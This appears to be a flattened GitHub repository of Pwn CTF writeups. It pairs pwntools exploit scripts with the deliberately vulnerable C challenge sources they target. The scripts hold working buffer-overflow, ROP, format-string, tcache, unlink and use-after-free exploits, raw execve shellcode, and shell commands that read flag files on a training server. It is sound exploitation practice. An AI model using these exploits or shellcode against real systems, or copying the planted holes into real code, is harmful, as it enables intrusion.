r.sendlineafter(":", p64(win)) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /oob5-sean_Pwn-5/oob5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob5-sean_Pwn-5/oob5 -------------------------------------------------------------------------------- /pass/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6125 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./pass") 10 | 11 | r.sendlineafter("?", flat("a" * 28, 0xdeadbeef)) 12 | 13 | r.interactive() 14 | -------------------------------------------------------------------------------- /pass/pass: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/pass/pass -------------------------------------------------------------------------------- /pass/pass.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | void printTheKey(){ 5 | /* 6 | * 7 | * print the key 8 | * 9 | */ 10 | } 11 | 12 | int main(){ 13 | setvbuf(stdout, 0, 2, 0); 14 | setvbuf(stdin, 0, 2, 0); 15 | int token = 1234; 16 | char key[16]; 17 | 18 | printf("Billy left his key in the locked room.\n"); 19 | printf("However, he forgot the token of the room.\n"); 20 | printf("Do you know what's the key?"); 21 | 22 | read(0, key, 40); 23 | 24 | if((int)token == 0xdeadbeef){ 25 | printf("Door open. OwO\n"); 26 | printTheKey(); 27 | system("cat /home/ctf/flag"); 28 | }else{ 29 | printf("Cannot open door. QwQ\n"); 30 | } 31 | 32 | return 0; 33 | } 34 | -------------------------------------------------------------------------------- /printable/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 4005 6 | 7 | r = remote(ip, port) 8 | # r = process("./printable") 9 | 10 | context.arch = "amd64" 11 | 12 | def Send(data): 13 | r.sendline(data.ljust(0x30 - 1, 'a')) 14 | time.sleep(0.1) 15 | 16 | Send("%10$p.%12$p.") 17 | out = r.recvline()[:-1].split(b'.') 18 | libc = int(out[0], 16) - 0x21b97 19 | log.info(hex(libc)) 20 | ret = int(out[1], 16) - 240 + 0x10 21 | log.info(hex(ret)) 22 | 23 | one = libc + 0x4f322 24 | 25 | # 12 -> 38 26 | 27 | def Write1(off, data): 28 | if data == 0: 29 | data = 256 30 | Send("%{}c%{}$hhn".format(int(data), off)) 31 | 32 | def Next(n): 33 | Send("%{}c%12$hhn".format((addr & 0xff) + n)) 34 | 35 | def Set(data): 36 | for i in range(8): 37 | Next(i) 38 | Write1(38, data & 0xff) 39 | data >>= 8 40 | Next(0) 41 | 42 | Send("%{}c%12$hn".format((ret & 0xffff))) 43 | addr = ret 44 | Set(one) 45 | Send("%{}c%12$hn".format((ret + 0x40 & 0xffff))) 46 | addr = ret + 0x48 47 | Set(0) 48 | 49 | time.sleep(0.1) 50 | r.sendline("exit") 51 | 52 | r.interactive() 53 | -------------------------------------------------------------------------------- /printable/printable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/printable/printable -------------------------------------------------------------------------------- /registration/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6128 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | r = process("./registration") 10 | 11 | ret = 0x400619 12 | win = 0x4007d6 13 | 14 | r.recvuntil(":") 15 | ID = int(r.recvline()[:-1]) 16 | log.info(ID) 17 | 18 | r.sendlineafter(":", "haha") 19 | 20 | payload = b"" 21 | payload += flat(b"a" * 60, ID) 22 | payload = payload.ljust(72) + flat(ret, win) 23 | 24 | r.sendlineafter(":", payload) 25 | 26 | r.interactive() 27 | -------------------------------------------------------------------------------- /registration/registration: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/registration/registration -------------------------------------------------------------------------------- /registration/registration.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"time.h" 3 | #include"stdlib.h" 4 | 5 | int id_backup; 6 | 7 | void systemAdmin(){ 8 | system("/bin/sh"); 9 | } 10 | 11 | int main(){ 12 | setvbuf(stdout, 0, 2, 0); 13 | setvbuf(stdin, 0, 2, 0); 14 | 15 | srand(time(NULL)); 16 | int id = rand()%100; 17 | id_backup = id; 18 | char name[16]; 19 | char email[32]; 20 | 21 | printf("Weclome to registration.\n"); 22 | printf("Here is your id :%d\n", id); 23 | printf("Please filled in information below to complete registration.\n"); 24 | 25 | printf("Name:"); 26 | gets(name); 27 | 28 | printf("email:"); 29 | gets(email); 30 | 31 | if(id != id_backup){ 32 | printf("Oops! some error occured.\n"); 33 | exit(0); 34 | } 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /ret2src/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6130 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./ret2src") 10 | 11 | pop_rdi = 0x400713 12 | gets = 0x400510 13 | bss = 0x602000 - 0x100 14 | 15 | payload = b"" 16 | payload += b"a" * 24 17 | payload += flat(pop_rdi, bss, gets, bss) 18 | 19 | r.sendlineafter(":", payload) 20 | 21 | import time 22 | time.sleep(0.5) 23 | 24 | r.sendline("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") 25 | 26 | r.interactive() 27 | -------------------------------------------------------------------------------- /ret2src/ret2src: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/ret2src/ret2src -------------------------------------------------------------------------------- /ret2src/ret2src.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | int main(){ 5 | setvbuf(stdout, 0, 2, 0); 6 | setvbuf(stdin, 0, 2, 0); 7 | 8 | char text[16]; 9 | 10 | printf("Give me your text :"); 11 | gets(text); 12 | 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /rop0-sean_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 3121 8 | 9 | r = remote(ip, port) 10 | # r = process("./rop0") 11 | 12 | data = 0x6ccd60 13 | pop_rsi = 0x401637 14 | pop_rax_rdx_rbx = 0x478616 15 | pop_rdi = 0x401516 16 | syscall = 0x4672b5 17 | 18 | r.sendline('/bin/sh\x00') 19 | time.sleep(0.1) 20 | r.sendline(b'a' * 40 + flat(pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data, pop_rsi, 0, syscall)) 21 | 22 | r.interactive() 23 | -------------------------------------------------------------------------------- /rop0-sean_Pwn-1/rop0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop0-sean_Pwn-1/rop0 -------------------------------------------------------------------------------- /rop1-sean_Pwn-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 3122 8 | 9 | r = remote(ip, port) 10 | # r = process("./rop1") 11 | 12 | data = 0x6ccd60 13 | pop_rsi = 0x401637 14 | pop_rax_rdx_rbx = 0x478616 15 | pop_rdi = 0x401516 16 | syscall = 0x4672b5 17 | leave = 0x4009e4 18 | 19 | r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00')) 20 | 21 | r.sendlineafter("=", b'a' * 32 + flat(data, leave)) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /rop1-sean_Pwn-2/rop1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop1-sean_Pwn-2/rop1 -------------------------------------------------------------------------------- /rop2-sean_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 3123 8 | 9 | data = 0x6CCD60 10 | pop_rsi = 0x401637 11 | pop_rax_rdx_rbx = 0x478616 12 | pop_rdi = 0x401516 13 | syscall = 0x4672b5 14 | pop_rbp = 0x4004d1 15 | leave = 0x4009e4 16 | 17 | while True: 18 | r = remote(ip, port) 19 | # r = process("./rop2") 20 | 21 | r.send(flat(leave, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00')) 22 | 23 | guess = 112 24 | r.sendafter("=", flat(data, leave, 0, 0) + p8(guess)) 25 | try: 26 | while True: 27 | try: 28 | time.sleep(0.1) 29 | r.sendline("cat /home/`whoami`/flag*") 30 | flag = r.recv() 31 | if b'{' in flag: 32 | r.interactive() 33 | except: 34 | r.close() 35 | break 36 | except: 37 | r.close() 38 | r.interactive() 39 | -------------------------------------------------------------------------------- /rop2-sean_Pwn-3/rop2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop2-sean_Pwn-3/rop2 -------------------------------------------------------------------------------- /secret/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6131 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./secret") 10 | 11 | r.sendlineafter(":", flat("a" * 24, 0xab3700000000)) 12 | r.sendlineafter("?", "Y") 13 | 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /secret/secret: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/secret/secret -------------------------------------------------------------------------------- /secret/secret.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | int main(){ 5 | setvbuf(stdout, 0, 2, 0); 6 | setvbuf(stdin, 0, 2, 0); 7 | int token = 0xabcd; 8 | char key[16]; 9 | char check; 10 | 11 | while(1){ 12 | printf("Please input your key :"); 13 | scanf("%s", key); 14 | 15 | printf("Your key is "); 16 | printf(key); 17 | printf("\n"); 18 | 19 | printf("Are you sure ? (Y/N)"); 20 | getchar(); 21 | scanf("%c", &check); 22 | if(check == 'Y')break; 23 | } 24 | 25 | if((int)token == 0xab37){ 26 | printf("Door open. OwO\n"); 27 | system("cat /home/ctf/flag"); 28 | }else{ 29 | printf("Cannot open door. QwQ\n"); 30 | } 31 | 32 | return 0; 33 | } 34 | -------------------------------------------------------------------------------- /snowman/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | r = process("./snowman") 6 | 7 | r.sendline("y") 8 | 9 | r.interactive() 10 | -------------------------------------------------------------------------------- /snowman/snowman: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/snowman/snowman -------------------------------------------------------------------------------- /snowman/snowman.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void 5 | snowman () 6 | { 7 | printf ("flag{0laf}\n"); 8 | } 9 | 10 | int 11 | main () 12 | { 13 | char ans[2]; 14 | printf ("Do you want to build a snowman?"); 15 | scanf ("%1s", ans); 16 | if (ans[0] == 'y') 17 | { 18 | snowman (); 19 | } 20 | else 21 | { 22 | ans[0] = 'y'; 23 | snowman (); 24 | } 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /snowman/snowman.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Just a guide for angr. 3 | You can solve the challenge (asciiart) by these skill. 4 | ''' 5 | import angr 6 | proj = angr.Project('snowman') 7 | snowman_adr = proj.loader.find_symbol('snowman').rebased_addr 8 | print(f'snowman in: {hex(snowman_adr)}') 9 | simgr = proj.factory.simgr() 10 | simgr.explore(find=0x400662) 11 | #simgr.explore(find=0x40066e) 12 | snowman_y = simgr.found[0] 13 | ans = snowman_y.mem[snowman_y.regs.rbp-0xa].uint8_t.resolved 14 | ans_0 = snowman_y.solver.eval(ans) 15 | print(f'ans[0] = {chr(ans_0)} ({ans_0})') 16 | print('stdout:', snowman_y.posix.dumps(1)) 17 | print('stdin:', snowman_y.posix.dumps(0)) 18 | print(simgr) 19 | simgr.move(from_stash='active', to_stash='garbage') 20 | print(simgr) 21 | simgr.move(from_stash='found', to_stash='active') 22 | print(simgr) 23 | simgr.explore(find=0x400617) 24 | print(simgr.found[0].posix.dumps(1)) 25 | -------------------------------------------------------------------------------- /tcache/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 4007 6 | 7 | # r = process("./tcache") 8 | r = remote(ip, port) 9 | 10 | def Say(data): 11 | r.sendlineafter(">", "1") 12 | time.sleep(0.1) 13 | r.send(data.ljust(0x18, b'\x00')) 14 | 15 | def Print(): 16 | r.sendlineafter(">", "2") 17 | 18 | def Burn(): 19 | r.sendlineafter(">", "3") 20 | 21 | context.arch = "amd64" 22 | 23 | atoi_got = 0x403fe8 24 | ptr = 0x404050 25 | 26 | def Write(addr, data): 27 | Say(b'') 28 | Burn() 29 | Burn() 30 | Burn() 31 | Burn() 32 | Say(p64(addr)) 33 | Say(b'') 34 | Say(data) 35 | 36 | Write(ptr, flat(atoi_got)) 37 | Print() 38 | r.recvline() 39 | libc = u64(r.recv()[:6].ljust(8, b'\x00')) - 0x40680 40 | log.info(hex(libc)) 41 | r.sendline("") 42 | 43 | one = libc + 0x4f322 44 | free_hook = libc + 0x3ed8e8 45 | Write(free_hook, p64(one)) 46 | Burn() 47 | 48 | r.interactive() 49 | -------------------------------------------------------------------------------- /tcache/tcache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/tcache/tcache -------------------------------------------------------------------------------- /uaf/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4006 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./uaf") 10 | 11 | win = 0x401239 12 | 13 | r.sendlineafter(">", "4") 14 | 15 | r.sendlineafter(">", "1") 16 | r.sendlineafter(":", "160") 17 | 18 | payload = b"a" * 8 * 19 19 | payload += flat(win) 20 | 21 | r.sendlineafter(":", payload) 22 | 23 | r.sendlineafter(">", "4") 24 | 25 | r.interactive() 26 | -------------------------------------------------------------------------------- /uaf/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/uaf/uaf -------------------------------------------------------------------------------- /unlink/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 9002 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./unlink") 10 | 11 | def Free(idx): 12 | r.sendlineafter(":", "0") 13 | r.sendlineafter("x = ", str(idx)) 14 | 15 | def Malloc(idx): 16 | r.sendlineafter(":", "1") 17 | r.sendlineafter("x = ", str(idx)) 18 | r.recvuntil(":") 19 | return int(r.recvline()[:-1], 16) 20 | 21 | def Write(idx, data): 22 | r.sendlineafter(":", "2") 23 | r.sendlineafter("x = ", str(idx)) 24 | r.sendlineafter("=", data) 25 | 26 | def Show(idx): 27 | r.sendlineafter(":", "3") 28 | r.sendlineafter("x = ", str(idx)) 29 | r.recvuntil(":\n") 30 | return r.recvline()[:-1] 31 | 32 | r.recvuntil(":") 33 | victim = int(r.recvline()[:-1], 16) 34 | r.recvuntil(":") 35 | sz = int(r.recvline()[:-1], 16) 36 | r.recvuntil(":") 37 | ary = int(r.recvline()[:-1], 16) 38 | log.info(hex(ary)) 39 | 40 | Malloc(0) 41 | Malloc(1) 42 | 43 | payload = b"" 44 | payload += flat(0, 0, ary - 0x18, ary - 0x10) 45 | payload = payload.ljust(0x80) 46 | payload += flat(0x80, 0x90) 47 | 48 | Write(0, payload) 49 | 50 | Free(1) 51 | 52 | Write(0, flat([0xdeadbeef] * 3)) 53 | 54 | r.sendlineafter(":", "87") 55 | 56 | r.interactive() 57 | -------------------------------------------------------------------------------- /unlink/unlink: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/unlink/unlink -------------------------------------------------------------------------------- /unlink/unlink.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #define MALLOC_SIZE 0x80 5 | 6 | int input(); 7 | 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | int select; 12 | unsigned long long size = 0x20; 13 | unsigned long long victim = 0x1337; 14 | char *ary[4]; 15 | setvbuf(stdout, NULL, _IONBF, 0); 16 | printf("victim's address:%p\n", &victim); 17 | printf("size's address:%p\n", &size); 18 | printf("ary's adr:%p\n", &ary[0]); 19 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 20 | while((select = input()) != EOF) 21 | { 22 | if(select == 1) // x = malloc 23 | { 24 | printf("ary[x] = malloc(%d) // (0 <= x <= 3)\nx = ", MALLOC_SIZE); 25 | if((select = input()) != EOF) ary[select] = (char *) malloc(MALLOC_SIZE); 26 | else printf("invalid number\n"); 27 | printf("adr:%p\n", ary[select]); 28 | } 29 | else if(select == 0) // free(x) 30 | { 31 | printf("free(ary[x]) // (0 <= x <= 3)\nx = "); 32 | if((select = input()) != EOF) 33 | { 34 | free(ary[select]); 35 | } 36 | else printf("invalid number\n"); 37 | } 38 | else if(select == 2) // x = string 39 | { 40 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 41 | while((select = input()) == EOF) 42 | { 43 | printf("invalid number\n"); 44 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 45 | } 46 | printf("string = "); 47 | read(0, ary[select], 0xa0); 48 | } 49 | else if(select == 3) // show x 50 | { 51 | printf("print *ary[x] // (0 <= x <= 3)\nx = "); 52 | if((select = input()) != EOF) printf("your string:\n%s\n", ary[select]); 53 | else printf("invalid number\n"); 54 | } 55 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 56 | } 57 | 58 | if(victim == 0xdeadbeef) 59 | { 60 | system("cat flag"); 61 | } 62 | printf("Goodbye!\n"); 63 | return 0; 64 | } 65 | 66 | 67 | int input() 68 | { 69 | int select; 70 | if(scanf("%d", &select) != EOF) 71 | { 72 | printf("%d\n", select); 73 | return (select >= 0 && select <= 3) ? select : EOF; 74 | } 75 | else 76 | { 77 | return EOF; 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /張元_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2111 5 | 6 | r = remote(ip, port) 7 | # r = process("./luck") 8 | 9 | payload = flat([0, 0, 0, 0xFACEB00C, 0xDEADBEEF, 0]) 10 | 11 | r.sendlineafter("me:", payload) 12 | r.sendlineafter(":", "pass") 13 | 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /張元_Pwn-1/luck: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-1/luck -------------------------------------------------------------------------------- /張元_Pwn-10/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2120 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./plt") 10 | 11 | system = 0x400530 12 | binsh = 0x601070 13 | pop_rdi = 0x400773 14 | 15 | r.sendlineafter("?", "/bin/sh\x00") 16 | 17 | payload = b"" 18 | payload += b"a" * 56 19 | payload += flat(pop_rdi, binsh, system) 20 | 21 | r.sendlineafter("?", payload) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /張元_Pwn-10/plt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-10/plt -------------------------------------------------------------------------------- /張元_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2113 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./rop") 10 | 11 | read = 0x43f5c0 12 | data = 0x6cc000 - 0x100 13 | pop_rdx_rsi = 0x442a19 14 | pop_rdi = 0x4014f6 15 | pop_rax = 0x44f6cc 16 | syscall = 0x4003da 17 | 18 | payload = b"" 19 | payload += b"\x00".ljust(40) 20 | payload += flat(pop_rdi, 0, pop_rdx_rsi, 0x10, data, read) 21 | payload += flat(pop_rax, 0x3b, pop_rdi, data, pop_rdx_rsi, 0, 0, syscall) 22 | 23 | r.sendlineafter(".", payload) 24 | 25 | import time 26 | time.sleep(0.5) 27 | 28 | r.sendline("/bin/sh\x00") 29 | 30 | r.interactive() 31 | -------------------------------------------------------------------------------- /張元_Pwn-3/rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-3/rop -------------------------------------------------------------------------------- /張元_Pwn-6/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2116 5 | 6 | r = remote(ip, port) 7 | # r = process("./pwntools") 8 | 9 | r.sendlineafter(")", p32(0x79487FF)) 10 | r.recvuntil(".\n") 11 | 12 | for _ in range(1000): 13 | res = r.recvuntil("?").split() 14 | a, b = int(res[0]), int(res[2]) 15 | op = res[1] 16 | if op == b"+": 17 | r.sendline(str(a + b)) 18 | elif op == b"-": 19 | r.sendline(str(a - b)) 20 | elif op == b"*": 21 | r.sendline(str(a * b)) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /張元_Pwn-6/pwntools: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-6/pwntools -------------------------------------------------------------------------------- /張元_Pwn-7/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-7/binary -------------------------------------------------------------------------------- /張元_Pwn-7/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2117 5 | 6 | r = remote(ip, port) 7 | # r = process("./binary") 8 | 9 | r.sendlineafter("1", "1048577") 10 | r.sendlineafter("2", "100 256 -87117812") 11 | r.sendlineafter("3", str(0x60107C)) 12 | 13 | r.interactive() 14 | -------------------------------------------------------------------------------- /張元_Pwn-8/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2118 5 | 6 | r = remote(ip, port) 7 | r = process("./return") 8 | 9 | context.arch = "amd64" 10 | 11 | ret = 0x400539 12 | win = 0x4006B6 13 | 14 | payload = b"" 15 | payload += flat("a" * 56, ret, win) 16 | 17 | r.sendlineafter(")", payload) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /張元_Pwn-8/return: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-8/return -------------------------------------------------------------------------------- /張元_Pwn-9/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 2119 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./shellcode") 10 | 11 | addr = int(r.recvline().split()[-1], 16) 12 | log.info(hex(addr)) 13 | 14 | payload = b"" 15 | payload += b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05".ljust(120) 16 | payload += p64(addr) 17 | 18 | r.sendline(payload) 19 | 20 | r.interactive() 21 | -------------------------------------------------------------------------------- /張元_Pwn-9/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-9/shellcode --------------------------------------------------------------------------------